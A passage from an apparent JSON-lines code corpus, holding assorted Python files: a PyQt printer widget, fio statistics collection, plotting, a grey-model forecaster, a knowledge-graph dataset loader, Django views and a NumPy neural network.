self.open_print_btn.clicked.connect(self.open_print)\n self.close_print_btn.clicked.connect(self.close_print)\n self.auto_complete.setChecked(True)\n # self.auto_complete.stateChanged.connect(self.auto_complete.func)\n\n main_layout = QGridLayout()\n main_layout.addWidget(QLabel(\"Porcja danych do druku\"), 0, 0)\n main_layout.addWidget(self.data_to_print, 0, 1)\n main_layout.addWidget(self.data_btn_us, 0, 2)\n main_layout.addWidget(self.delete, 0, 3)\n main_layout.addWidget(self.auto_complete, 1, 3)\n main_layout.addWidget(self.open_print_btn, 0, 7)\n main_layout.addWidget(self.close_print_btn, 1, 7)\n main_layout.addWidget(QLabel(\"Dodatkowe atrybuty\"), 1, 0)\n main_layout.addWidget(self.attributes_field, 1, 1)\n main_layout.addWidget(self.atr_btn_us, 1, 2)\n main_layout.addWidget(self.buttonBox, 2, 1)\n main_layout.addWidget(QLabel(\"Wybierz atrybuty wydruku\"), 3, 2)\n main_layout.addWidget(self.W, 4, 0)\n main_layout.addWidget(self.H, 4, 1)\n main_layout.addWidget(self.N, 4, 2)\n main_layout.addWidget(self.I, 4, 3)\n main_layout.addWidget(self.U, 4, 4)\n main_layout.addWidget(self.E, 4, 5)\n main_layout.addWidget(self.Q, 4, 6)\n main_layout.addWidget(self.G, 4, 7)\n self.setLayout(main_layout)\n\n # def auto_complete_func(self):\n # if self.auto_complete.isChecked:\n # self.W.setEnabled(True)\n # self.H.setEnabled(True)\n # self.N.setEnabled(True)\n # self.I.setEnabled(True)\n # self.U.setEnabled(True)\n # self.E.setEnabled(True)\n # self.Q.setEnabled(True)\n # self.G.setEnabled(True)\n # else:\n # self.W.setEnabled(False)\n # self.H.setEnabled(False)\n # self.N.setEnabled(False)\n # self.I.setEnabled(False)\n # self.U.setEnabled(False)\n # self.E.setEnabled(False)\n # self.Q.setEnabled(False)\n # self.G.setEnabled(False)\n\n def accept(self):\n attr = \"\"\n if self.W.isChecked():\n attr += \"W\"\n if self.H.isChecked():\n attr += \"H\"\n if self.N.isChecked():\n attr += \"N\"\n if self.I.isChecked():\n attr += \"I\"\n if self.U.isChecked():\n attr += \"U\"\n if self.E.isChecked():\n attr += \"E\"\n if self.Q.isChecked():\n attr += \"Q\"\n if self.G.isChecked():\n attr += \"G\"\n textfield = self.data_to_print.text()\n attributes = self.attributes_field.text()\n if self.auto_complete.isChecked():\n comm = f'\\x1cD6\\x1cL{attr}\"{textfield}\"\\x1c{attributes}\\x1c\\x03'\n else:\n comm = f'\\x1cD6\\x1c{textfield}\\x1c{attributes}\\x1c\\x03'\n\n self.sendCommand.emit(comm)\n if self.delete.isChecked():\n self.data_to_print.clear()\n self.attributes_field.clear()\n\n def open_print(self):\n self.sendCommand.emit('\\x1cD2\\x1c\\x03')\n\n def close_print(self):\n self.sendCommand.emit('\\x1cD3\\x1c0\\x1c\\x03')\n\n","sub_path":"printwidget.py","file_name":"printwidget.py","file_ext":"py","file_size_in_byte":4772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"238438884","text":"import os \nimport sys\nimport json\nfrom datetime import datetime\nimport csv \n\n\n# function to compute increment in percent of target from compare\ndef cmpr(target, compare): \n if compare == 0: \n return \"0 (0)\" \n inc = (target - compare) / compare * 100 \n formatstr = \"%d (%+.2f%%)\" if isinstance(target, int) \\\n else \"%.2f (%+.2f%%)\"\n return formatstr % (target, inc) \n\n\nif not os.path.exists(\"stats\"):\n os.mkdir(\"stats\")\n\ntimestamp = datetime.now().strftime(\"%Y%m%d-%H%M%S\")\nstatdir = os.path.join(\"stats\", timestamp)\nos.mkdir(statdir)\nprint(\"Collecting stat and save to dir: %s\" % statdir)\n\nfor outdir in os.listdir(\".\"): \n if outdir[:6] == \"output\": \n stat = dict()\n task = outdir[7:]\n if not task:\n task = \"baseline\"\n \n for out_file in os.listdir(outdir): \n job_name, out_format = out_file.split('.')\n job_stat = stat.setdefault(job_name, dict())\n file_path = os.path.join(outdir, out_file)\n if out_format == \"out\": \n with open(file_path, 'r') as fio_f:\n fio_json = json.load(fio_f) \n fio_job = fio_json[\"jobs\"][0] \n fio_stat = fio_job[\"read\"] \n if fio_stat[\"bw\"] == 0: \n fio_stat = fio_job[\"write\"]\n job_stat[\"lat\"] = {\n \"mean\": round(fio_stat[\"lat\"][\"mean\"], 2),\n \"50p\": fio_stat[\"clat\"][\"percentile\"][\"50.000000\"], \n \"90p\": fio_stat[\"clat\"][\"percentile\"][\"90.000000\"],\n \"99p\": fio_stat[\"clat\"][\"percentile\"][\"99.990000\"]\n }\n job_stat[\"bw\"] = fio_stat[\"bw\"] \n else: # .perf \n with open(file_path, 'r') as perf_f:\n job_stat[\"cpu\"] = perf_f.readline().strip().split()\n\n with open(os.path.join(statdir, task + \".json\"), \"w\") as json_w: \n json.dump(stat, json_w, indent=2) \n\n with open(os.path.join(statdir, task + \".csv\"), \"w\") as csv_w: \n writer = csv.writer(csv_w) \n writer.writerow([\"Job name\", \"Lat(us)\", \"50 Percentile\", \"90 Percentile\", \"99 Percentile\", \"BW(KB/s)\",\n \"CPU-user\", \"CPU-nice\", \"CPU-system\", \"CPU-idle\", \"CPU-iowait\", \"CPU-irq\", \"CPU-softirq\", \n \"CPU-steal\", \"CPU-guest\", \"CPU-guest_nice\", \"CPU-total\", \"CPU-per-io\"])\n\n for job_name in sorted(stat.keys()): \n job_stat = stat[job_name]\n cpu_util = sum(map(float, job_stat[\"cpu\"][:3] + job_stat[\"cpu\"][5:]))\n writer.writerow([job_name, job_stat[\"lat\"][\"mean\"], job_stat[\"lat\"][\"50p\"], job_stat[\"lat\"][\"90p\"], \n job_stat[\"lat\"][\"99p\"], job_stat[\"bw\"]] + job_stat[\"cpu\"] + [cpu_util, cpu_util*4./job_stat[\"bw\"]])\n","sub_path":"overhead_analysis/collect_stat.py","file_name":"collect_stat.py","file_ext":"py","file_size_in_byte":2838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"322909461","text":"\nimport os\nimport pylab\nimport numpy as np\nimport math\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\n#import cmn.cmn as cmn\nimport libs.genplotlib as gpl\n#import libs.rstatslib as rsl\n#import rpy2.robjects as robjects\n\nFIGDPI=2000 # Figure DPI.\nFIGW=5# Figure width.\n#FIGW=6 # Figure width.\nFIGH=2.5 #Figure height.\n\nFONTSZ=10.5# Size of font.\nLW = 1 # Width of lines in the figure.\nSTITLESZ=10 # Title font size.\n\nBARWIDTH=1\nYMIN=0\nYLABEL2 ='%'\nYAXISTICKS2 = 7 # Number of y-axis ticks.\n\n\ndef multiplot(barwidth, ymin, ylim, ylabel, yaxisticks, subplotn, subplotl,\n fontsz=9, stitlesz=10, lw=1, starpos=0.8):\n \n\n # ======== LOAD DATA =============\n\n\n vals = [1.0000000, 0.952381,0.5077160,0.7978395,0.3989198,0.9791667,1.333333]\n conds = ['wild type', 'Betaintnu', 'CG34127','en','Nhe3','NrxI','NrxIV','pten']\n pvals = [1, 1.0000000,float(3.435737e-10),float('6.822819e-04'),float('1.520537e-01'),float('4.357747e-05'),float('1.000000e+00'),0.2702228]\n lowerci = [0,0.5763321,0.03640119,0.32733873,0.58824737,0.23783224,0.76559003,0.8732456]\n upperci = [0,1.573797,0.3251716,0.7874888,1.0821092,0.6691144,1.2523248,2.035828]\n\n # ======== SET INITIAL FIGURE PROPERTIES =============\n mpl.rc('axes', linewidth=lw)\n mpl.rc('axes.formatter', limits = [-6, 6])\n\n # Sets font to Arial and assigns font properties.\n fontv = mpl.font_manager.FontProperties()\n fontv = mpl.font_manager.FontProperties(fname='/home/andrea/.matplotlib/arial.ttf')\n fontv.set_size(fontsz)\n # Sets italicized font.\n fonti = mpl.font_manager.FontProperties(fname='/home/andrea/.matplotlib/ariali.ttf')\n fonti.set_size(fontsz)\n\n # Defines coordinates for each bar.\n barnum = len(vals)\n lastbar = (1.5*barnum*barwidth)-barwidth # X-coordinate of last bar\n x_gen1 = np.linspace(0.5+0.5*barwidth, lastbar, barnum).tolist()\n x_list = x_gen1\n \n\n # Set width of bars.\n truebarw = 0.35*barwidth\n\n # Defines the axes.\n ax = plt.subplot(subplotn)\n \n\n # =========== PLOT DATA =======================\n \n plt.bar(x_list, vals, yerr=[lowerci,upperci], width=truebarw, \n color='#d3d3d3', bottom=0, ecolor='k', capsize=0.5, linewidth=lw)\n\n \n # ======== ADDS TICKS, LABELS and TITLES==========\n # Sets the x- and y-axis limits.\n xlim = x_list[-1]+1.5*barwidth\n plt.axis( [0, xlim, ymin, ylim])\n \n # Plots and formats xlabels.\n #plt.xticks(x_list, conds, rotation=45, fontproperties=fonti)\n \n x_list = [x + 0.5*truebarw for x in x_gen1]\n plt.xticks(x_list, conds, rotation=90, fontproperties=fonti)\n\n # Labels the yaxis; labelpad is the space between the ticklabels and y-axis label.\n plt.ylabel(ylabel, labelpad=4, fontproperties=fontv, multialignment='center')\n \n\n # Add title\n t = plottitle(metric, kind)\n\n plt.title(t, fontsize=stitlesz)\n \n # Labels the subplot\n plt.text(-0.2, 1.0, subplotl, transform=ax.transAxes)\n \n \n # ========FORMATS THE PLOT==========\n\n # Removes borders\n for loc, spine in ax.spines.iteritems():\n if loc in ['left','bottom']:\n pass\n elif loc in ['right','top']:\n spine.set_color('none') # don't draw spine\n else:\n raise ValueError('unknown spine location: %s'%loc)\n\n\n # ========FORMATS THE TICKS=========\n\n #Uncomment lines below to display ticks only where there are borders.\n ax.xaxis.set_ticks_position('bottom')\n ax.yaxis.set_ticks_position('left')\n\n #Removes the tickmarks on the x-axis but leaves the labels and the spline.\n for line in ax.get_xticklines():\n line.set_visible(False)\n\n # Formats the y ticks.\n plt.yticks(fontproperties=fontv)\n\n # Specifies the number of tickmarks/labels on the yaxis.\n ax.yaxis.set_major_locator(mpl.ticker.MaxNLocator(yaxisticks))\n\n\n # ========ADDS SIGNIFICANCE STARS============\n\n\n p05i = [i for i, pval in enumerate(pvals) if pval <0.05 and pval >= 0.01]\n \n for i in p05i:\n plt.text(x_list[i], starpos*ylim, '*', horizontalalignment='center', \n fontsize=fontsz)\n\n p01i = [i for i, pval in enumerate(pvals) if pval <0.01 and pval >= 0.001]\n for i in p01i:\n plt.text(x_list[i], starpos*ylim, '**', horizontalalignment='center', \n fontsize=fontsz)\n\n p001i = [i for i, pval in enumerate(pvals) if pval <0.001]\n for i in p001i:\n plt.text(x_list[i], starpos*ylim, '***', horizontalalignment='center', \n fontsize=fontsz)\n \n\n\nmultiplot(BARWIDTH, YMIN, YLIM, YLABEL, YAXISTICKS, fontsz=9, stitlesz=10, lw=1, starpos=0.8)\nplt.savefig('rrplot.png')\n","sub_path":"behavior/plotrr.py","file_name":"plotrr.py","file_ext":"py","file_size_in_byte":4622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"324671256","text":"import os, json\nraw = 'pichle din ki report'\nopen('commands/_i', 'w').close()\nf = open(\"commands/_i\", \"a\")\nf.write(raw)\nf.close()\nos.system('sh ./commands/ner_time.sh')\njson_res = {}\nwith open('commands/_o') as fp:\n line = fp.readline()\n while line:\n line = fp.readline()\n line = line.replace('HTTP/1.1 200 OK', '')\n if 'data' in line and 'null' not in line:\n json_res.update(json.loads(line))\nprint(json_res)","sub_path":"test/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"33388289","text":"import sys\nx = list(map(int, sys.stdin.readline().split()))\n\nn = x[0]\nm = (n + 1) // 2\n\nfor i in range(1, n + 1):\n for j in range(n):\n if i == 1:\n print('*', end='')\n if 1 < i:\n print(' ' * (m - 1), end='')\n print('*', end='')\n \n print(sep='\\n')","sub_path":"4_8-printT.py","file_name":"4_8-printT.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"267251091","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\n\n# @Time : 2019/8/8 23:33\n# @Author : Zhen Chen\n# @Email : 15011074486@163.com\n\n# Python version: 3.7\n# Description: 灰色系统预测方法,\n 本程序为 GM(1, 1)模型,若有多个自变量,则可以构建 GM(1, h)模型,\n 更复杂的模型还有 GM(n, h) 模型\n\n\"\"\"\n\nimport numpy as np\nimport math\nimport matplotlib.pyplot as plt\n\n\ndef gm(history_data):\n \"\"\"\n 灰色模型 GM(1, 1)\n\n :param history_data: 历史数据\n :return: 预测值,预测序列,误差\n \"\"\"\n T = len(history_data)\n sum_data = [0] * T\n sum_data[0] = history_data[0]\n for i in range(1, T):\n sum_data[i] = sum_data[i - 1] + history_data[i]\n B = np.zeros([T - 1, 2])\n for i in range(T - 1):\n B[i, 0] = -0.5 * (sum_data[i] + sum_data[i + 1])\n B[i, 1] = 1\n X = history_data[1:T]\n\n [alpha, u] = (np.dot(np.linalg.inv(np.dot(B.T, B)), np.dot(B.T, X))).T\n\n forecast_data = [0] * (T + 1)\n forecast_data[0] = history_data[0]\n for i in range(1, T + 1):\n forecast_data[i] = (forecast_data[0] - u / alpha) * math.exp(-alpha * i) + u / alpha\n\n forecast_data_final = [0] * (T + 1)\n forecast_data_final[0] = forecast_data[0]\n for i in range(1, T + 1):\n forecast_data_final[i] = forecast_data[i] - forecast_data[i - 1]\n PE = [0] * T # absolute percentage error\n for i in range(T):\n PE[i] = abs(forecast_data_final[i] - history_data[i]) / history_data[i]\n MPE = sum(PE) / T\n\n return forecast_data_final[T], forecast_data, MPE\n\n\ndef draw_picture(history_data, forecast_data):\n # 解决 plt 中文显示问题\n plt.rcParams['font.sans-serif'] = ['SimHei']\n plt.rcParams['axes.unicode_minus'] = False\n\n T = len(history_data)\n plt.plot(range(1, T + 1), history_data, '-o', label='历史数据')\n plt.plot(range(1, T + 2), forecast_data, '-o', label='预测数据')\n plt.legend()\n plt.title('灰色模型预测')\n plt.xticks(range(1, T + 2))\n plt.grid(axis='y')\n plt.show()\n return\n\n\nhistory_value = [394, 7269, 3954, 1723]\nforecast_value_final, forecast_values, error = gm(history_value)\nprint('预测值为: %.2f' % forecast_value_final)\nprint('预测误差为: %.2f%%' % (error * 100))\ndraw_picture(history_value, forecast_values)\n","sub_path":"Elec Power Chongqing/new-forecast-codes/grey_model.py","file_name":"grey_model.py","file_ext":"py","file_size_in_byte":2338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"230863756","text":"import concurrent.futures\nimport functools as ft\nimport itertools as it\nimport pathlib\nimport shutil\nimport string\n\nimport networkx as nx\nimport numpy as np\nimport pandas as pd\nimport tqdm\n\nfrom . import decompress, download, feature, sparql, subgraph, util\n\n\n@util.delegate(\n \"neighbourhood\",\n \"all_neighbourhoods\",\n \"enclosing\",\n \"all_enclosing\",\n to=\"subgraph_extractor\",\n)\nclass Dataset:\n def __init__(self, data):\n self.data = data\n\n def __len__(self):\n return len(self.data)\n\n @ft.cached_property\n def entities(self):\n return pd.concat(\n [self.data[\"head\"], self.data[\"tail\"]], ignore_index=True\n ).unique()\n\n @ft.cached_property\n def relations(self):\n return self.data[\"relation\"].unique()\n\n def save(self, dest):\n self.data.to_csv(dest)\n\n def split(self, **kwargs):\n return Split.split(self, **kwargs)\n\n def load_split(self, path):\n return Split.load(self, path)\n\n @ft.cached_property\n def subgraph_extractor(self):\n return subgraph.Extractor(self)\n\n def rel_dists(self):\n return feature.rel_dists(self.data)\n\n def to_networkx(self):\n return nx.MultiDiGraph(\n zip(self.data[\"head\"], self.data[\"tail\"], self.data[\"relation\"])\n )\n\n @staticmethod\n def load(path):\n return Dataset(pd.read_csv(path, dtype=str))\n\n\nclass Split:\n def __init__(self, dataset, **partitions):\n self.dataset = dataset\n self.partitions = partitions\n\n def get_partition(self, name):\n return self.dataset.data.loc[self.partitions[name]]\n\n @ft.cached_property\n def available_partitions(self):\n return list(self.partitions.keys())\n\n @staticmethod\n def split_idx(idx):\n train_length = round(len(idx) * 0.8)\n valid_length = (len(idx) - train_length) // 2\n\n train = idx[:train_length]\n valid = idx[train_length : train_length + valid_length]\n test = idx[train_length + valid_length :]\n\n return train, valid, test\n\n\nclass FB15K237Raw(Dataset):\n def __init__(self, path, split=None):\n self.path = path\n self.split = split\n\n if not isinstance(self.path, pathlib.Path):\n self.path = pathlib.Path(self.path)\n\n @ft.cached_property\n def data(self):\n path = self.path / \"raw\"\n\n if not path.exists():\n self.download()\n\n if self.split is None:\n return pd.concat(map(pd.read_csv, path.glob(\"*.csv\")), ignore_index=True)\n else:\n return pd.read_csv((path / self.split).with_suffix(\".csv\"))\n\n def download(self):\n compressed_path = download.download_file(\n \"https://download.microsoft.com/download/8/7/0/8700516A-AB3D-4850-B4BB-805C515AECE1/FB15K-237.2.zip\",\n self.path,\n )\n\n decompressed_path = decompress.decompress_zip(\n compressed_path, self.path, keep=True\n )\n\n source_dir = self.path / \"Release\"\n target_dir = self.path / \"raw\"\n target_dir.mkdir(parents=True, exist_ok=True)\n\n for file_name in tqdm.tqdm(\n [\"train.txt\", \"valid.txt\", \"test.txt\"], desc=\"Moving files\", unit=\"files\"\n ):\n pd.read_csv(\n source_dir / file_name,\n sep=\"\\t\",\n names=[\"head\", \"relation\", \"tail\"],\n ).to_csv((target_dir / file_name).with_suffix(\".csv\"), index=False)\n\n shutil.rmtree(source_dir)\n\n\nclass FB15K237(Dataset):\n def __init__(self, path, split=None):\n self.path = path\n self.split = split\n\n if not isinstance(self.path, pathlib.Path):\n self.path = pathlib.Path(self.path)\n\n def __len__(self):\n return len(self.data)\n\n @ft.cached_property\n def raw_dataset(self):\n return FB15K237Raw(self.path, split=self.split)\n\n @ft.cached_property\n def data(self):\n return self.raw_dataset.data.assign(\n head=self.wikidata_labels.loc[self.raw_dataset.data[\"head\"]].values,\n tail=self.wikidata_labels.loc[self.raw_dataset.data[\"tail\"]].values,\n )\n\n @ft.cached_property\n def wikidata_labels(self):\n path = self.path / \"wikidata_labels.csv\"\n\n if not path.exists():\n self.get_wikidata_labels().to_csv(path)\n\n return pd.read_csv(path, index_col=0)\n\n def get_wikidata_labels(self):\n query = (\n \"SELECT ?fb ?itemLabel \"\n \"WHERE {{ ?item wdt:P646 ?fb. VALUES ?fb {{ {fb_ids} }} \"\n \"SERVICE wikibase:label {{ bd:serviceParam wikibase:language 'en'. }} }}\"\n ).format(\n fb_ids=\" \".join([f\"'{entity}'\" for entity in self.raw_dataset.entities])\n )\n\n result = sparql.Wikidata().query(query)\n\n grouped = {\n key: list(value)\n for key, value in it.groupby(\n result.bindings, lambda value: value[\"fb\"][\"value\"]\n )\n }\n\n def reduce_group(entity):\n try:\n return list(grouped[entity])[0][\"itemLabel\"][\"value\"]\n except (IndexError, ValueError, KeyError):\n return None\n\n return pd.Series(\n {entity: reduce_group(entity) for entity in self.raw_dataset.entities},\n name=\"wikidata_label\",\n )\n","sub_path":"kgdata/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":5314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"502282428","text":"from django.shortcuts import render\nfrom django.views.generic import TemplateView\n\nfrom .forms import ReporteForm\nfrom .models import *\n\n\nclass AugmentCalc(TemplateView):\n template_name = 'augment_calc/inicio.html'\n\n def get_context_data(self, **kwargs):\n context = super(AugmentCalc, self).get_context_data()\n activo = Augment_Type.objects.get(id=1)\n chance = Augment_Type.objects.get(id=2)\n pasivo = Augment_Type.objects.get(id=3)\n context['lista_todos'] = Augment_Skill.objects.all()\n context['lista_activos'] = Augment_Skill.objects.filter(type=activo)\n context['lista_chances'] = Augment_Skill.objects.filter(type=chance)\n context['lista_pasivos'] = Augment_Skill.objects.filter(type=pasivo)\n return context\n\n\ndef reporte(request):\n todos_los_aumentos = Augment_Skill.objects.all()\n lista_aumentos = []\n for elemento in todos_los_aumentos:\n lista_aumentos.append(elemento.short_format)\n\n if request.POST:\n form = ReporteForm(request.POST)\n if form.is_valid():\n form.save()\n # Limpiar el formulario\n form = ReporteForm()\n reporte_guardado = True\n return render(request, 'augment_calc/reporte.html', {'lista_aumentos': lista_aumentos,\n 'form': form,\n 'reporte_guardado': reporte_guardado})\n else:\n form = ReporteForm()\n\n return render(request, 'augment_calc/reporte.html', {'lista_aumentos': lista_aumentos,\n 'form': form})\n","sub_path":"augment_calc/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"491527952","text":"\n\ndef add_binary(b1, b2):\n n = len(b1) if len(b1) > len(b2) else len(b2)\n \n if len(b1) 0] = 1\n return tmp\n\n\nclass Network(object):\n \"\"\"Feedfoward Neural Network with vectorized implementation\"\"\"\n\n def __init__(self, sizes, nonlinearity):\n self.num_layers = len(sizes)\n self.sizes = sizes\n self.biases = [np.random.randn(y, 1) for y in sizes[1:]]\n self.weights = [np.random.randn(y, x) / np.sqrt(x) for x, y in zip(sizes[:-1], sizes[1:])]\n self.nonlinearity = nonlinearity\n\n def feedforward(self, X):\n # hidden layers\n activation = np.array([x for x in X]).T\n for W, b in zip(self.weights[:-1], self.biases[:-1]):\n z = W.dot(activation) + b\n activation = self.nonlinearity.output(z)\n\n # softmax layer\n z = self.weights[-1].dot(activation) + self.biases[-1]\n shift_z = z - np.max(z, axis=0)\n yprobs = np.exp(shift_z) / np.sum(np.exp(shift_z), axis=0)\n return yprobs.T\n\n def train(self, training_data, validation_data, mini_batch_size, epochs, eta, lmbda, verbose=False):\n \"\"\"\n eta: learning rate\n lmbda: regularization coef\n verbose: output training info if True\n \"\"\"\n\n num_train = len(training_data)\n training_cost, training_accuracy = [], []\n validation_cost, validation_accuracy = [], []\n\n best_accuracy = 0\n global global_best_accuracy\n num_iter = epochs * (num_train // mini_batch_size)\n for i in range(num_iter):\n batch_idx = np.random.choice(num_train, mini_batch_size, replace=True)\n mini_batch = training_data[batch_idx]\n self.SGD(mini_batch, eta, lmbda, len(training_data))\n\n if verbose and i % (num_train // mini_batch_size) == 0:\n print('iter {}/{}'.format(i, num_iter))\n cost = self.total_cost(training_data, lmbda, converted=True)\n print(\"Cost on training data: {:.6f}\".format(cost))\n\n # update learning rate\n if training_cost and cost > training_cost[-1] and eta > 1e-4:\n eta *= 0.1\n print('update the learning rate', eta)\n training_cost.append(cost)\n\n accuracy = self.accuracy(training_data, converted=True)\n training_accuracy.append(accuracy)\n print(\"Accuracy on training data: {:.4f}\".format(accuracy))\n\n cost = self.total_cost(validation_data, lmbda, converted=False)\n validation_cost.append(cost)\n print(\"Cost on validation data: {:.6f}\".format(cost))\n\n accuracy = self.accuracy(validation_data, converted=False)\n validation_accuracy.append(accuracy)\n print(\"Accuracy on validation data: {:0.4f}\".format(accuracy))\n\n if accuracy > best_accuracy:\n best_accuracy = accuracy\n self.save_model(\"model/cifar.model\")\n print(\"Best Accuracy is {:.4f}\".format(best_accuracy))\n print()\n\n # use only when tuning hyperparameters by grid searching\n if accuracy > global_best_accuracy:\n global_best_accuracy = accuracy\n with open('data/best_accuracy.txt', 'w') as f:\n f.write(str((accuracy, lmbda))) # update when tuning the parameters\n self.save_model(\"model/best_cifar.model\")\n return training_cost, training_accuracy, validation_cost, validation_accuracy\n\n def SGD(self, mini_batch, eta, lmbda, n, p=0.5):\n X = np.array([x for x in mini_batch[:, 0]]).T\n y = np.array([y for y in mini_batch[:, 1]]).T\n\n # feedforward\n activation = X\n activations, zs = [X, ], []\n drop_indicts = []\n for W, b in zip(self.weights[:-1], self.biases[:-1]):\n z = W.dot(activation) + b\n zs.append(z)\n activation = self.nonlinearity.output(z)\n drop_indict = (np.random.randn(*activation.shape) < p) / p # inverted dropout\n drop_indicts.append(drop_indict)\n activation *= drop_indict\n activations.append(activation)\n\n # softmax layer\n z = self.weights[-1].dot(activation) + self.biases[-1]\n zs.append(z)\n shift_z = z - np.max(z, axis=0)\n activation = np.exp(shift_z) / np.sum(np.exp(shift_z), axis=0)\n activations.append(activation)\n\n db = [np.zeros(b.shape) for b in self.biases]\n dw = [np.zeros(w.shape) for w in self.weights]\n\n # backprop\n delta = activation - y\n db[-1] = np.sum(delta, axis=1).reshape(-1, 1)\n dw[-1] = delta.dot(activations[-2].T)\n for i in range(2, self.num_layers):\n z = zs[-i]\n delta = np.dot(self.weights[-i + 1].T, delta) * self.nonlinearity.deriative(z)\n delta *= drop_indicts[-i + 1] # dropout\n db[-i] = np.sum(delta, axis=1).reshape(-1, 1)\n dw[-i] = delta.dot(activations[-i - 1].T)\n\n # update params\n self.biases = [(1 - eta * (lmbda / n)) * b - (eta / len(mini_batch)) * nb for b, nb in zip(self.biases, db)]\n self.weights = [(1 - eta * (lmbda / n)) * w - (eta / len(mini_batch)) * nw for w, nw in zip(self.weights, dw)]\n\n def total_cost(self, data, lmbda, converted=False):\n \"\"\"compute cost on the data, converted=true when data is training data, otherwise False\"\"\"\n\n ypred = self.feedforward(data[:, 0])\n y = data[:, 1] if converted else np.array([vectorized_result(j) for j in data[:, 1]])\n cost = sum([cross_entropy_cost(a, y) for a, y in zip(ypred, y)]) / len(data)\n cost += 0.5 * (lmbda / len(data)) * sum(np.linalg.norm(w)**2 for w in self.weights)\n return cost\n\n def accuracy(self, data, converted=False):\n \"\"\"compute accuracy on the data, converted=true when data is training data, otherwise False\"\"\"\n\n y = data[:, 1] if not converted else np.array([np.argmax(e) for e in data[:, 1]])\n ypred = [np.argmax(y) for y in self.feedforward(data[:, 0])]\n return np.mean(ypred == y)\n\n def save_model(self, model_path):\n data = {\"sizes\": self.sizes,\n \"weights\": [w.tolist() for w in self.weights],\n \"biases\": [b.tolist() for b in self.biases]}\n with open(model_path, \"w\") as f:\n json.dump(data, f)\n\n\ndef load_model(model_path):\n with open(model_path, \"r\") as f:\n data = json.load(f)\n\n net = Network(data[\"sizes\"], relu_activation)\n net.weights = [np.array(w) for w in data[\"weights\"]]\n net.biases = [np.array(b) for b in data[\"biases\"]]\n return net\n\n\ndef main():\n \"\"\"\n params of the best model:\n ** activation: relu\n ** hidden_size: 2000\n ** dropout: 0.5\n ** batch_size: 20\n ** lmbda: 200\n ** accuracy: 59.08%\n \"\"\"\n\n training_data, validation_data, test_data = load_pca_data('data')\n\n # training\n net = Network([192, 2000, 10], relu_activation)\n net.train(\n training_data=training_data,\n validation_data=validation_data,\n mini_batch_size=20,\n epochs=60,\n eta=1e-2,\n lmbda=200,\n verbose=True)\n\n # test\n net = load_model('model/best_cifar.model')\n print(\"accuracy on the test_data is {:.4f}\".format(net.accuracy(training_data, converted=True)))\n print(\"accuracy on the test_data is {:.4f}\".format(net.accuracy(validation_data)))\n print(\"accuracy on the test_data is {:.4f}\".format(net.accuracy(test_data)))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"cs231n/FNN_softmax.py","file_name":"FNN_softmax.py","file_ext":"py","file_size_in_byte":8854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"21717438","text":"from helpers import *\nimport models\nfrom django.http import JsonResponse, HttpResponseBadRequest\nimport datetime\nimport ujson as json\n\n@checkAuth('UPLOADERROR')\ndef upload(request):\n if request.method == 'POST' and 'file' in request.FILES and 'type' in request.POST and request.POST['type'] in ['task']:\n file_data = handle_file_upload(reqiest.FILES['file'])\n if file_data is None:\n return HttpResponseBadRequest()\n # Need for plan\n return JsonResponse({'UPLOAD': True })\n else:\n return HttpResponseBadRequest()\n\n\n@check('USERTASKS')\ndef get_tasks(request):\n\ttasks = models.Task.objects.all()\n\tdata = json.loads(request.body)\n\tstart = data['start'] if 'start' in data else 0\n\tcount = data['count'] if 'count' in data else 10\n\tfilters = data['filters'] if 'filters' in data else None\n\n\tif not filters is None:\n\t\tfor f in filters:\n\t\t\tif f == 'start_time':\n\t\t\t\ttasks = tasks.order_by('-start_time' if filters[f] == 'desc' else 'start_time')\n\t\t\telif f == 'stop_time':\n\t\t\t\ttasks = tasks.order_by('-stop_time' if filters[f] == 'desc' else 'stop_time')\n\t\t\telif f == 'status':\n\t\t\t\tif filters[f] == 'inprogress':\n\t\t\t\t\ttasks = tasks.filter(status=1)\n\t\t\t\telif filters[f] == 'finished':\n\t\t\t\t\ttasks = tasks.filter(status=2)\n\t\t\t\telif filters[f] == 'failed':\n\t\t\t\t\ttasks = tasks.filter(status=3)\n\t\t\telif f == 'search':\n\t\t\t\ttasks = tasks.filter(title__icontains=filters[f])\n\t\t\telif f == 'user':\n\t\t\t\tif filters[f] == 'current' and request.user.is_authenticated():\n\t\t\t\t\ttasks = tasks.filter(user=request.user)\n\t\t\t\telif filters[f] != '*':\n\t\t\t\t\ttask_user = models.User.objects.get(username=filters[f])\n\t\t\t\t\ttasks = tasks.filter(user=task_user)\n\t\t\t\t\n\n\treturn JsonResponse([{\n\t\t'task_id': t.task_id,\n\t\t'title': t.title,\n\t\t'start_time': t.start_time.strftime('%d.%m.%Y'),\n\t\t'stop_time': t.stop_time.strftime('%d.%m.%Y'),\n\t\t'description': t.description,\n\t\t'status': t.status,\n\t\t'user_id': t.user.username,\n\t\t'user_name': ('%s %s') % (t.user.first_name, t.user.last_name)\n\t\t} for t in tasks[start:start+count]], safe=False)\n","sub_path":"www/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":2050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"552328138","text":"from PySide2 import QtGui, QtCore, QtWidgets\nfrom PySide2.QtCore import Slot, Signal\n\nclass HTMLDictionaryExtractorWidget(QtWidgets.QWidget):\n def __init__(self, parent, extractor):\n 